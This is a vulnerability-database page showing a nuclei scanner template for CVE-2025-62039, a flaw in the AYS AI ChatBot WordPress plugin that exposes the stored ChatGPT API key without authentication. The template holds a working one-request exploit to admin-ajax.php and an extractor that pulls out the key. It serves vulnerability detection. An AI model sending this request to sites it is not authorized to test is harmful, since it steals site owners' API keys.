Lucene search
K

AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure

🗓️ 23 Apr 2026 07:16:35Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Unauthenticated key exposure in AYS AI ChatBot with ChatGPT up to version 2.6.6.

Related
Refs
Code
id: CVE-2025-62039

info:
  name: AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure
  author: pussycat0x
  severity: high
  description: |
    AYS AI ChatBot with ChatGPT and Content Generator <= 2.6.6 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted input.
  impact: Attackers can retrieve embedded sensitive information, potentially leading to data leakage and privacy violations.
  remediation: Update to the latest version beyond 2.6.6.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ays-chatgpt-assistant/ai-chatbot-with-chatgpt-and-content-generator-by-ays-266-unauthenticated-information-exposure
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp-plugin,ays-chatgpt-assistant

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chatgpt_admin_ajax&function=get_chatgpt_api_key

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success\":true")'
          - 'contains(body, "api_key")'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: api_key
        json:
          - '.data.api_key'
# digest: 490a00463044022007d06b9472c223651fcb31380c476042becbef9dccb81772b40db1773b35c6e402200ac6a0dddd497a0797b264eef40b61cf750c2e1e14e96e4d6faa076716024975:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 16:54Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.01273
SSVC
7